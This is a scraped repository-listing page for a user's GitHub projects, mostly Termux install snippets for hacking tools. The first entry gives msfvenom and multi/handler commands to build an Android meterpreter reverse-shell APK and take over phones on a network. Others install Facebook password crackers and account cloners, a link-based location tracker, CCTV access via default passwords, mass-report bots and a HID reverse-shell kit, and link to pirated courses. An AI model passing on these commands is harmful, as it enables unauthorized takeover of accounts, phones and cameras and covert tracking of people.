Giter Site home page Giter Site logo

nyctophile 's Projects

- icon -

اختراق جميع هواتف اندرويد داخل الشبكة بستخدام #كالي لينوكس امر انشاء بايلود. msfvenom -p android/meterpreter/reverse_tcp lhost=192.......... lport=4444 -o /home/kali/Desktop/app.apk =====================================اوامر فتح الجلسة. use multi/handler set payload android/meterpreter/reverse_tcp set lhost خاص بك set lport خاص بك exploit

-.- icon -.-

تحديد مكان ايا شخص بدقيق بإرسال برابط فقط. اوامر في الشرح: git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh python3 seeker.py -t manual

-metasploit-e-unable-to-locate-package-unstable-rebo icon -metasploit-e-unable-to-locate-package-unstable-rebo

& pkg upgrade -y & pkg install ruby -y & pkg install ruby & gem install bundler:1.17.3 & pkg install curl -y & curl -LO http://github.com/termux/termux-packages/files/3960686 metasploit_5.0.56_android5_all.deb.gz & ls & gunzip metasploit_5.0.56_android5_all.deb.gz & ls & dpkg -i metasploit_5.0.56_android5_all.deb & apt install -f -y & Msfconsole

a2sv--ssl-vul-scan icon a2sv--ssl-vul-scan

A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device

advanced-brute-force-attack-tool icon advanced-brute-force-attack-tool

Advanced Brute Force Attack Tool. This tool has been developed for "ethical hacking course" students don't use it for illegal purposes. git clone https://github.com/AzizKpln/Bruter19 cd Bruter19 chmod +x setup.sh ./setup.sh python3 bruter19.py Remove the

androbug-framework icon androbug-framework

Androbug Framework Androbug framework is used to check the android apps vulnerabilities to find bugs in android application. Execute these commands one by one to install. Installation : $ apt update $ apt upgrade $ apt install git $ apt install python2 $ git clone https://github.com/ AndroBugs/AndroBugs_Framework $ cd AndroBugs_Framework $ chmod +x * usage : Now move your app to AndroBugs_Framework folder for example : mv app.apk /$HOME/ AndroBugs_Framework/ $ python2 androbugs.py -f app.apk -o result.txt above command is used to check app bugs app.apk = is your app name result.txt = to store all information It shows all bugs and vulnerabilities of your app that's it

bellaseye icon bellaseye

BellasEye:-- An #Automated_Network_Penetration and #vulnerability_Analysis Tool Written In #Bash. A fun and easy program is written on #Bash to automate and save time during vulnerability analysis and penetration testing. It automates various tools such as #NMAP, #Gobuster, #theHarvester, etc. It uses a custom-designed Vulnerability Lookup which parses major databases like #ExploitDB, #National_Vulnerability_Database, and #VulDB (requires an #API key). It saves all the outputs to separate files for easy use. https://github.com/necromorph98/BellasEye

bhot icon bhot

BHOT is a python based script. You can use this tool for crack facebook users passwords. This tool works on both rooted Android device and Non-rooted Android device. pkg update && pkg upgrade $ pkg install python $ pkg install python2 $ pkg install git $ pkg install wget $ pkg install php $ pkg install openssh $ git clone https://github.com/botolmehedi/bhot $ pip2 install requests $ pip2 install mechanize $ ls $ cd bhot $ python2 bhot.py Username/password thandabotol/gorombotol

black-dragon icon black-dragon

Black-Dragon Tools Installer For Pentesting And Hack Account,Work On Terminal How To Install it Tested On Termux(Android 6.0) $ pkg update && pkg upgrade $ pkg install python2 $ pkg install python $ pkg install php $ pkg install curl $ pkg install perl $ gem install lolcat $ pkg install jq $ pkg install ruby cowsay toilet figlet $ pip2 install mechanize $ pip2 install requests $ pkg install git $ git clone https://github.com/Sad-Boy-1922/Black-Dragon/ $ cd Black-Dragon $ sh install.sh

bluforce-fb icon bluforce-fb

git clone https://github.com/AngelSecurityTeam/BluForce-FB cd BluForce-FB pip2 install mechanize python2 bluforcefb.py Note: EMAIL = ID = PHONE

botol-baba-akash icon botol-baba-akash

Botol Baba Akash.... pkg update && pkg upgrade pkg install python2 pkg install git pkg install requests mechanize git clone https://github.com/akashbotolbaba/botolbaba cd botolbaba python2 botolbaba.py

brut-no-root icon brut-no-root

brut no root $ apt install wget $ apt install curl $ wget https://raw.githubuserontent.com/bytezcrew/wfdroid-termux/master/wfdinstall $ chmod 777 wfdinstall $ ./wfdinstall $ wfdroid

brutal icon brutal

commands git clone https://github.com/Screetsec/Brutal.git cd Brutal chmod +x Brutal.sh sudo ./Brutal.sh or sudo su ./Brutal.sh about : Now Teensy can be use for penetration Teensy like a rubber ducky , why im choose teensy ? because the price very cheap for me . t’s extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s machine and completely compromise it, regardless of autorun. I’ve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal Brutal Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device like my telegram : https://t.me/joinchat/U6sWbKY-UFFB6CUV

bughunter icon bughunter

git clone https://github.com/thehackingsage/bughunter.git && cd bughunter && chmod +x bughunter.py && python2 bughunter.py

call icon call

&& Call $  git clone https://github.com/siputra12/fakecall.git $ cd fakecall $ php call.php

cctv-hacking icon cctv-hacking

HACK CCTV CAMERA ANYWHERE IN THE WOLD USING THIS TOOL #IT IS MY OWN THIS TOOLA IT IS AMAZING BRO #Wait... #FOR INSTALL THIS TOOL TYPE $ pkg update $ pkg upgrade $ pkg install git $ pkg install python $ pkg inatall python2 $ pkg install figlet $ git clone https://github.com/U-danbaiwa/CCTV-HACKING.git $ cd $ ls $ cd CCTV-HACKING $ python cctv-hack.py # HOW TO USE after choose option and country Just copy ip address of CCTV CAMERA and paste It in your BROWSER YOU WILL BEGAN SEE CCTV you can stop it Or you can Resume it eTc But Just for educational purpose pls #SOME COMMAND CCTV CAMERA PASSWORD IS: username: admin password: admin or username: admin password: #leave it empty or username:1234567 Password:1234567 ETC Follow me on github for more #THANK #YOU

click-jacking-scanner icon click-jacking-scanner

Click-Jacking Scanner click jacking scanner.. this script scans target site is vulnerable for this attack Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/D4Vinci/ Clickjacking-Tester $ cd Clickjacking-Tester $ chmod +x * Now create here file.txt file, in this file paste victem website and save it usage : $ python3 Clickjacking-Tester.py file.txt Now it starts scanning if target is vulnerable then it shows you.....

cms-map-vul-scanner icon cms-map-vul-scanner

Cms map Vul scanner cms map is a tool used to find the vulnerabilities of websites such as joomla,dripal,wordpress with the help of this tool we can scan our site vulnerabilities and fix it,and stay safe and secure. Execute these commands one by one to install. Installation : $ apt update $ apt upgrade $ apt install git $ apt install python2 $ git clone https://github.com/Dionach/ CMSmap.git $ cd CMSmap $ chmod +x * usage : $ python2 cmsmap.py -h [it shows all options how we can use this tool]

cracker icon cracker

Perintah Termux : $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Rozak-bot/Cracker.git $ cd Cracker $ python2 Crack.py Login Menggunakan Token. WORK ONLY FOR INDONESIA

dark_crack icon dark_crack

$ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ pip2 install requests $ pip2 install mechanize $ git clone https://github.com/Dunia-Kode/Dark_Crack $ cd Dark_Crack $ python2 main.py

darkfly-tool icon darkfly-tool

Pkg update && pkg upgrade Pkg install git Pkg instell python2 git clone https://github.com/Ranginang67/DarkFly-tool Cd DarkFly-tool Python2 install .py DarkFly

deadtrap icon deadtrap

Installation Installation process similar for both windows and linux just type the following commands : git clone https://github.com/Chr0m0s0m3s/DeadTrap.git cd DeadTrap pip3 install -r requirements.txt Useage type the following commands in your terminal python3 main.py -n <your_number> -s <scanner> -o -r Lincense

ethical-hacking-cyber-security-course-complete-package-paid-courses-for-free- icon ethical-hacking-cyber-security-course-complete-package-paid-courses-for-free-

Ethical Hacking & Cyber Security Course : Complete Package Paid courses for Free 🔥🔥 🔗Download: --> https://www.mediafire.com/file/tsh0w88b6mus96y/Ethical+Hacking+&+Cyber+Security+Course+-+Complete+Package.rar/file Exploit Development for Linux x64 🔗Download: --> https://mega.nz/folder/DpFXTajT#-QgmsdT05eT0vuYo9sjXYA Exploit Development for Linux (x86) 🔗Download: --> https://mega.nz/folder/P4V10awQ#x1iJjk1gLAzIKbj2Ta8Blw Linux Heap Exploitation - Part 1 🔗Download: --> https://mega.nz/folder/j0swAL7T#xPojjkSDtIwuDS4VJR0_GA Expert Malware Analysis and Reverse Engineering 🔗Download: --> https://mega.nz/folder/ThkUwJgT#RUCaDYSj9tiP7OevJ-1HjQ Binary Exploits with Python 🔗Download: --> https://mega.nz/folder/XkswBQKS#ihcitspPL9nQiEvC4hxIzQ Hands-on Fuzzing and Exploit Development 🔗Download: --> https://mega.nz/folder/i88mFA7A#OIYSAhjHeuAys3B4MCepwg Hands-on Fuzzing and Exploit Development (Advanced) 🔗Download: --> https://mega.nz/folder/ux9SUIiJ#bxHCViNRLn01I4Y1x73B8w ______Tech Summer YT_______

facebook-id-auto-report icon facebook-id-auto-report

Facebook ID Auto Report $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ pkg install unzip $ pkg install tor $ pkg install mechanize $ git clone https://github.com/ llayTamvan/Report.git $ cd Report $ unzip Report.zip $ python2 Report.py If this is now working then try this open new session $ git clone https://github.com/ uhusmanhaider/facebook-report $ cd facebook-report $ ls $ unzip Report.zip $ python2 Report.py Enter binary code of Facebook account......

facedook icon facedook

👉pkg update && pkg upgrade 👉 pkg install python2 👉 pkg install git 👉 pip2 install requestsq 👉 pip2 install mechanize 👉 git clone https://github.com/Bangbadruyt/hackfb.git 👉 cd hackfb 👉 python2 hackfb #Username:KANG #Pass:COLI

facedook...-tools-cracker- icon facedook...-tools-cracker-

NEW!! Tools Cracker $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ pip2 install requests $ pip2 install mechanize $ git clone https://github.com/Dunia-Kode/XCrack $ cd XCrack $ python2 main.py

fb-id-cloning icon fb-id-cloning

2021 New Update Tools For Fb id Cloning 🔰New Features🔰 #Dump Id From Friend List > Crack From File. #Dump Id From Public Id Friend List > Crack File. #Dump id From Group Members > Crack From File. #Dump Id From Message > Crack From File [Custom Choose Password Available] [~] installation $ pkg update $ pkg upgrade $ pkg install python $ pkg install python2 $ pip2 install requests $ pip2 install mechanize $ pip2 install bs4 $ pkg install git $ git clone https://github.com/Azim-vau/crack-pro.git $ cd crack-pro $ python2 cr3k.py User & Pass [No Need] High Speed Cloner By Mr. Error (Azim-Vau)

fbtool icon fbtool

INSTALLATION git clone https://github.com/mkdirlove/FBTOOL cd FBTOOL python2 fbtool.py

ginf icon ginf

Installation and Using GINF apt-get install git php git clone https://github.com/Gameye98/GINF cd GINF php ginf.php

h-tool icon h-tool

git clone https://github.com/Anon-Divyanth/H-Tool cd H-Tool pip install -r requirements.txt python Htool.py Remove the This is a package of all hacking tools., This tool contain over 200+ Advance and professional Hacking tools.it contain phishing,Bruteforcing, Vulnerability scanning,information gathering, Wifi hacking,tracing and tracking,Exploitation, Password attacking,creating malwares,Bombing, Another hacking tools., Thanks to my Hacker Friends Joyson and Prudhvi.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.